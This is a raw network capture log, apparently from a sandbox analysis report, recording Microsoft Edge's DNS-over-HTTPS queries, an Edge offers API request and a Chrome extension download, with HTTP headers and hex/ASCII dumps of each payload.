                                                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                                                    Date: Thu, 21 Nov 2024 21:13:06 GMT
                                                                                                                                                                                                                                                                                    Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                    Content-Length: 468
                                                                                                                                                                                                                                                                                    CF-RAY: 8e63ae85ed1c41fe-EWR
                                                                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                    2024-11-21 21:13:06 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 00 f6 00 04 8e fa 50 43 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                    Data Ascii: wwwgstaticcomPC)


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    2192.168.2.549976162.159.61.34434408C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-11-21 21:13:05 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                    Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Content-Length: 128
                                                                                                                                                                                                                                                                                    Accept: application/dns-message
                                                                                                                                                                                                                                                                                    Accept-Language: *
                                                                                                                                                                                                                                                                                    User-Agent: Chrome
                                                                                                                                                                                                                                                                                    Accept-Encoding: identity
                                                                                                                                                                                                                                                                                    Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                    2024-11-21 21:13:05 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                    Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                                                                                                    2024-11-21 21:13:06 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                                                    Date: Thu, 21 Nov 2024 21:13:06 GMT
                                                                                                                                                                                                                                                                                    Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                    Content-Length: 468
                                                                                                                                                                                                                                                                                    CF-RAY: 8e63ae85ec9eefa9-EWR
                                                                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                    2024-11-21 21:13:06 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 1c 00 04 8e fb 28 a3 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                    Data Ascii: wwwgstaticcom()


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    3192.168.2.549977162.159.61.34434408C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-11-21 21:13:05 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                    Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Content-Length: 128
                                                                                                                                                                                                                                                                                    Accept: application/dns-message
                                                                                                                                                                                                                                                                                    Accept-Language: *
                                                                                                                                                                                                                                                                                    User-Agent: Chrome
                                                                                                                                                                                                                                                                                    Accept-Encoding: identity
                                                                                                                                                                                                                                                                                    Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                    2024-11-21 21:13:05 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                    Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                                                                                                    2024-11-21 21:13:06 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                                                    Date: Thu, 21 Nov 2024 21:13:06 GMT
                                                                                                                                                                                                                                                                                    Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                    Content-Length: 468
                                                                                                                                                                                                                                                                                    CF-RAY: 8e63ae863c21430f-EWR
                                                                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                    2024-11-21 21:13:06 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 00 fd 00 04 8e fb 29 03 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                    Data Ascii: wwwgstaticcom))


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    4192.168.2.54998094.245.104.564434408C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-11-21 21:13:06 UTC428OUTGET /edgeoffer/pb/experiments?appId=edge-extensions&country=CH HTTP/1.1
                                                                                                                                                                                                                                                                                    Host: api.edgeoffer.microsoft.com
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                    Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                    2024-11-21 21:13:07 UTC584INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    Content-Type: application/x-protobuf; charset=utf-8
                                                                                                                                                                                                                                                                                    Date: Thu, 21 Nov 2024 21:13:06 GMT
                                                                                                                                                                                                                                                                                    Server: Microsoft-IIS/10.0
                                                                                                                                                                                                                                                                                    Set-Cookie: ARRAffinity=e5e4197507aadfd116f59447fade3d01fe97a8db2e83bfcd54af3bd128319bb7;Path=/;HttpOnly;Secure;Domain=api.edgeoffer.microsoft.com
                                                                                                                                                                                                                                                                                    Set-Cookie: ARRAffinitySameSite=e5e4197507aadfd116f59447fade3d01fe97a8db2e83bfcd54af3bd128319bb7;Path=/;HttpOnly;SameSite=None;Secure;Domain=api.edgeoffer.microsoft.com
                                                                                                                                                                                                                                                                                    Request-Context: appId=cid-v1:48af8e22-9427-456d-9a55-67a1e42a1bd9
                                                                                                                                                                                                                                                                                    X-Powered-By: ASP.NET


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    5192.168.2.549983162.159.61.34434408C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-11-21 21:13:06 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                    Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Content-Length: 128
                                                                                                                                                                                                                                                                                    Accept: application/dns-message
                                                                                                                                                                                                                                                                                    Accept-Language: *
                                                                                                                                                                                                                                                                                    User-Agent: Chrome
                                                                                                                                                                                                                                                                                    Accept-Encoding: identity
                                                                                                                                                                                                                                                                                    Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                    2024-11-21 21:13:06 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                    Data Ascii: wwwgstaticcom)TP


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    6192.168.2.549984162.159.61.34434408C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-11-21 21:13:06 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                    Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Content-Length: 128
                                                                                                                                                                                                                                                                                    Accept: application/dns-message
                                                                                                                                                                                                                                                                                    Accept-Language: *
                                                                                                                                                                                                                                                                                    User-Agent: Chrome
                                                                                                                                                                                                                                                                                    Accept-Encoding: identity
                                                                                                                                                                                                                                                                                    Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                    2024-11-21 21:13:06 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                    Data Ascii: wwwgstaticcom)TP


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    7192.168.2.549982162.159.61.34434408C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-11-21 21:13:06 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                    Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Content-Length: 128
                                                                                                                                                                                                                                                                                    Accept: application/dns-message
                                                                                                                                                                                                                                                                                    Accept-Language: *
                                                                                                                                                                                                                                                                                    User-Agent: Chrome
                                                                                                                                                                                                                                                                                    Accept-Encoding: identity
                                                                                                                                                                                                                                                                                    Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                    2024-11-21 21:13:06 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                    Data Ascii: wwwgstaticcom)TP


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    8192.168.2.550002142.251.35.1614434408C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-11-21 21:13:09 UTC594OUTGET /crx/blobs/AW50ZFsLPhJJyx_4ShcDOgcEpJeOc7Vr0kMzfFRoaMfWx4pAgZ0UGF2i9_ei1A7FAHQ-EPFULeBn7F8_SEKhjbpEyKfiidX7GF_6BDOycMeg5w03wjwVQ61hkaEix8WFqmEAxlKa5cmz_tdFr9JtRwdqRu82wmLe2Ghe/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_84_1_0.crx HTTP/1.1
                                                                                                                                                                                                                                                                                    Host: clients2.googleusercontent.com
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                    Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                    2024-11-21 21:13:10 UTC573INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                    Content-Length: 138356
                                                                                                                                                                                                                                                                                    X-GUploader-UploadID: AFiumC5o3EfmoRX5Dz29nH_MZkIFgttqo2Rx3ejj7psa_ZmmzABSQ5xLGC8juD5CKGCT_JT3gE9JKpUQMg
                                                                                                                                                                                                                                                                                    X-Goog-Hash: crc32c=ld9IFg==
                                                                                                                                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                                                                                                                                    Date: Thu, 21 Nov 2024 16:45:00 GMT
                                                                                                                                                                                                                                                                                    Expires: Fri, 21 Nov 2025 16:45:00 GMT
                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                                    Age: 16089
                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 19 Nov 2024 16:44:49 GMT
                                                                                                                                                                                                                                                                                    ETag: 2373c8b9_cba0b209_e851cacf_d4df989e_81c52a41
                                                                                                                                                                                                                                                                                    Content-Type: application/x-chrome-extension
                                                                                                                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    2024-11-21 21:13:10 UTC817INData Raw: 43 72 32 34 03 00 00 00 e0 15 00 00 12 ac 04 0a a6 02 30 82 01 22 30 0d 06 09 2a 86 48 86 f7 0d 01 01 01 05 00 03 82 01 0f 00 30 82 01 0a 02 82 01 01 00 9c 5e d1 18 b0 31 22 89 f4 fd 77 8d 67 83 0b 74 fd c3 32 4a 0e 47 31 00 29 58 34 b1 bf 3d 26 90 3f 5b 6a 2c 4c 7a fd d5 6a b0 75 cf 65 5b 49 85 71 2a 42 61 2f 58 dd ee dc 50 c1 68 fc cd 84 4c 04 88 b9 99 dc 32 25 33 5f 6f f4 ae b5 ad 19 0d d4 b8 48 f7 29 27 b9 3d d6 95 65 f8 ac c8 9c 3f 15 e6 ef 1f 08 ab 11 6a e1 a9 c8 33 55 48 fd 7c bf 58 8c 4d 06 e3 97 75 cc c2 9c 73 5b a6 2a f2 ea 3f 24 f3 9c db 8a 05 9f 46 25 11 1d 18 b4 49 08 19 94 80 29 08 f2 2c 2d c0 2f 90 65 35 29 a6 66 83 e7 4f e4 b2 71 14 5e ff 90 92 01 8d d3 bf ca a0 d0 39 a0 08 28 e3 d2 5f d5 70 68 32 fe 10 5e d5 59 42 50 58 66 5f 38 cc 0b 08
                                                                                                                                                                                                                                                                                    Data Ascii: Cr240"0*H0^1"wgt2JG1)X4=&?[j,Lzjue[Iq*Ba/XPhL2%3_oH)'=e?j3UH|XMus[*?$F%I),-/e5)fOq^9(_ph2^YBPXf_8
                                                                                                                                                                                                                                                                                    2024-11-21 21:13:10 UTC1390INData Raw: 5f b2 be 56 5f e7 71 3a 5f 86 5f 7f f9 35 7d d5 75 53 5c 9b ff 18 eb af ff 78 3f ab fa d7 9f 7e 5d cf 1f 43 2d ff b3 ba 0c 53 3d 4c bf fe f2 f7 5f 63 f1 50 97 42 ea cf d7 8f b0 2d 4d db 10 dc 36 32 b3 69 2a b3 51 d5 e3 f8 c4 ad eb 39 ef e7 ef dc 9c de 2b 53 3d 89 f4 f8 84 0e 2f 36 3a df cf c2 57 83 c8 90 71 6c 2f 67 fd f9 26 6a a9 79 fc f9 7b af ae 22 8b ce b1 9a fe 7c 1c dc 46 fa 1f e7 f8 7c 9c a3 f6 e3 56 f9 f6 f0 f3 99 aa 77 be 25 74 2e 79 86 2e 3f df 17 26 e2 e2 61 cc 9c 7f 3c d2 6e c2 88 c1 89 f6 53 2b 7c d4 17 3d 05 72 61 c7 0a 84 08 01 b1 27 7d f8 28 82 70 57 fb c2 16 8f d0 39 05 d7 73 e5 43 a3 d8 1f 9f 8e ca b9 96 26 6a 4a 9f 2d 27 13 f6 27 13 a8 ca 42 8d 30 f5 75 3f 2e a5 b9 3b 9f f6 e1 a3 34 9d 7f cf f3 e7 d9 c2 b9 f0 d4 c0 ac e6 90 42 86 4e 5c
                                                                                                                                                                                                                                                                                    Data Ascii: _V_q:__5}uS\x?~]C-S=L_cPB-M62i*Q9+S=/6:Wql/g&jy{"|F|Vw%t.y.?&a<nS+|=ra'}(pW9sC&jJ-''B0u?.;4BN\
                                                                                                                                                                                                                                                                                    2024-11-21 21:13:10 UTC1390INData Raw: 8e b5 a1 c8 fb ee 81 60 65 eb 98 45 ab ec b5 f7 df 38 3e ce 17 36 8b 4c d7 7b 85 4d 64 18 16 65 b0 90 1e f2 cb 03 4c 8a 00 e1 48 79 96 ec 9b 3d f6 a0 d6 80 10 57 0f 10 60 43 7e af 8e 3f 1c b7 7a ee 1d 59 c2 29 1a 94 12 c6 ec 9e 28 ba 47 74 ea a9 92 fb f2 20 bd f4 20 c3 8a 8a 04 03 ec 56 83 d6 68 aa f5 88 d1 39 0a d6 d7 be fa 7f 68 70 d5 e2 31 37 1a 25 03 f1 55 98 2a 4b bd 68 22 81 eb 25 ad 18 84 19 e6 b8 d7 a1 60 b9 67 e1 89 9c f6 e2 ad 52 d0 c5 a6 dc ad e7 9e dc ca 7f d2 3e 77 87 7d e1 a1 a5 e9 a4 17 9a 04 c0 1e 05 42 14 c6 78 22 8b d6 00 1f f3 28 78 31 13 f3 7e 67 01 4e 72 8a 0f 75 ff 71 5f e5 6f 6d cd bd d1 43 0a 76 99 35 be 4a e5 2d 31 6c 3a 02 10 c5 56 13 ea 1e 23 15 1d 58 74 af 43 75 3d f0 13 03 bc 22 a2 fc ca 82 66 b9 ee fd 2e c5 46 f6 b8 53 d7 bc
                                                                                                                                                                                                                                                                                    Data Ascii: `eE8>6L{MdeLHy=W`C~?zY)(Gt Vh9hp17%U*Kh"%`gR>w}Bx"(x1~gNruq_omCv5J-1l:V#XtCu="f.FS
                                                                                                                                                                                                                                                                                    2024-11-21 21:13:10 UTC1390INData Raw: eb 3e aa 67 36 b6 c2 7d dd cf 6f 71 6a 3c aa 40 7e 15 06 ce 18 81 87 14 8e b0 58 44 27 7a dd 77 ac b1 b7 dc 66 ab cf 89 e9 ce a6 3c ec 05 3f 02 02 d8 27 ea 46 4f 70 bb e1 2d 44 84 4e 09 f6 ed 1b e9 1b c5 3d 68 a6 0c d9 75 0f 3f b1 8e cd 35 f6 95 bf 91 bd 1a 69 d1 42 51 b5 ee b9 e2 ce 89 50 6c 26 16 de 89 5e bc e6 c4 fd 26 da f5 e3 ce 69 10 77 1e cc c8 01 e9 9e 41 6a 55 a0 38 bc ac b1 bf 6b be 7b ba 51 77 aa c0 9b 05 fc b0 44 37 6a e6 e1 c0 0e 78 4a 7b 14 13 4f eb 10 ed ee 3f fb 8d c4 1f af b9 25 7e f2 af cb 87 f0 11 f9 c7 c7 ff c1 df c8 80 4b b7 c6 3f 03 ce 51 66 ae c1 bd e9 35 31 9c a0 54 88 27 0b eb 52 98 2c 14 76 36 e7 d3 53 74 70 f3 94 48 50 51 74 c1 6a 6c c5 02 57 75 bf ea 37 d6 5c 85 75 ff 1a de 92 f6 c3 8e 3c db 2b f4 fc 0a bf 49 4b a8 ce 14 7e 00
                                                                                                                                                                                                                                                                                    Data Ascii: >g6}oqj<@~XD'zwf<?'FOp-DN=hu?5iBQPl&^&iwAjU8k{QwD7jxJ{O?%~K?Qf51T'R,v6StpHPQtjlWu7\u<+IK~
                                                                                                                                                                                                                                                                                    2024-11-21 21:13:10 UTC1390INData Raw: 48 3f c7 20 98 a3 4a ae e7 0e 9d 1f 06 63 15 24 ff cb b8 61 7b a2 4e 58 74 c0 4c 09 86 ba 97 48 e8 03 c4 a9 0f ee 35 65 bd 60 e1 21 a1 18 44 a6 bd 68 e1 33 23 9a dc 91 a1 d2 1c 38 bf d3 98 ca 64 0f d9 ab 56 8f 6d 95 56 f8 a5 e3 ec 3d ef d5 2d b3 5c 3d e6 ff 3a fe 0d 19 c0 60 d4 b8 23 8f b9 88 da a3 ee df 88 f6 ec a7 9c 21 9f 2e 21 cc 81 f2 75 fd ed 12 f6 f3 fe 52 6a 9f db f0 a2 fb e9 a7 81 d4 f7 eb f5 58 53 9e 25 3f f7 32 7e 98 ff 3b 96 ae c7 fe 9f e7 2d df ff f0 9c e5 bf be 3b 4a 9f 4d 99 a9 ba 7f 9d 95 6c 74 8c da b7 42 c7 85 e0 d3 bd e4 8e ca 4d fb 56 f6 ea 5a f6 b6 f6 9f f3 77 e9 37 5f 85 df 9d ff fb bb 96 8e e7 01 8d 3f b9 f3 73 16 f3 d4 7e 18 a7 d6 fb f9 ff 5d c7 97 a1 e3 ee bb 84 8e a9 59 2c 05 d7 fa d6 5e e6 f7 e4 df 87 46 8b e9 f6 55 5f 7f fd e5
                                                                                                                                                                                                                                                                                    Data Ascii: H? Jc$a{NXtLH5e`!Dh3#8dVmV=-\=:`#!.!uRjXS%?2~;-;JMltBMVZw7_?s~]Y,^FU_
                                                                                                                                                                                                                                                                                    2024-11-21 21:13:10 UTC1390INData Raw: 50 3d 5b 7f a3 9a c1 c2 43 a0 f0 9c cf 84 2c dc 6f 77 dd ff 5e 04 27 23 01 db 3b d0 22 fa fd ca c2 00 94 91 17 e4 5e bb e4 28 b3 f2 09 87 4b 75 14 8e e0 c2 6f 3a 13 0a 28 96 4a ee 0a 6a 2c 09 f3 2c c2 e9 23 6a 8c ec 09 a0 e8 96 87 84 d2 68 a5 cd ca f5 ec 0a 46 60 f9 be 7b e8 5e a6 f5 2e a5 46 6e c8 a6 db bc 01 50 4b 07 08 1d fb 12 3a a0 00 00 00 23 01 00 00 50 4b 03 04 14 00 08 08 08 00 00 00 21 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 2d 00 5f 6c 6f 63 61 6c 65 73 2f 72 6f 2f 6d 65 73 73 61 67 65 73 2e 6a 73 6f 6e 55 54 05 00 01 ca 36 2a 67 0a 00 20 00 00 00 00 00 01 00 18 00 00 41 64 ae 95 2f db 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 8d 52 c1 4e 1c 31 0c bd f3 15 d6 9c 8a 34 a0 65 7b 82 1b 82 55 4f 85 aa 2d 97 aa 17 6f c6 b3 58 ca 38 51
                                                                                                                                                                                                                                                                                    Data Ascii: P=[C,ow^'#;"^(Kuo:(Jj,,#jhF`{^.FnPK:#PK!-_locales/ro/messages.jsonUT6*g Ad/RN14e{UO-oX8Q
                                                                                                                                                                                                                                                                                    2024-11-21 21:13:10 UTC1390INData Raw: ee 12 87 56 cb 68 4b 0f 6e 3d 2c 91 9f b7 f2 c2 8f 9e 81 ed 64 91 89 5f c8 93 db ec d7 38 3e f4 ec 97 19 5a 11 ad f3 b8 82 28 3a 6c b3 ee 24 e1 50 fb 79 09 cf f1 ad 57 e9 76 70 aa 85 35 32 aa 0a 0f 41 0d 1c 63 cf 15 51 0d 8c 44 97 9c 43 b8 94 04 8f 60 5f 09 e2 4b c0 6e a2 3a 29 12 e1 86 4f 49 97 b9 92 11 e2 5a d6 16 fc 60 20 03 a5 d7 f5 68 06 5f 65 93 9a dd ad 65 97 51 8b ac 05 b4 69 a5 64 30 17 f8 1c 4a 1d 10 6c a0 02 36 20 1b 29 c2 cd 6a e6 f5 e9 55 66 60 81 a8 0e 0c 0c 22 4a e0 41 05 8c 7f 9c 57 46 cf 54 ff 32 7c 7d 9b 6e 4b 1e be a1 2b 8b 2c ea 96 fa 5c 18 5d 04 b1 51 7c 89 a2 45 6d 3a 0b 61 c3 6f a2 78 04 e6 19 c0 10 c1 b2 2f e8 63 ec 0d 6c f9 20 a0 26 d6 8b ea b0 75 64 be 5d fd c4 70 d9 3b b5 ed d4 f1 bc 8d 4d 4a b4 8e 05 bc 1a 18 57 05 34 4d 40 13
                                                                                                                                                                                                                                                                                    Data Ascii: VhKn=,d_8>Z(:l$PyWvp52AcQDC`_Kn:)OIZ` h_eeQid0Jl6 )jUf`"JAWFT2|}nK+,\]Q|Em:aox/cl &ud]p;MJW4M@
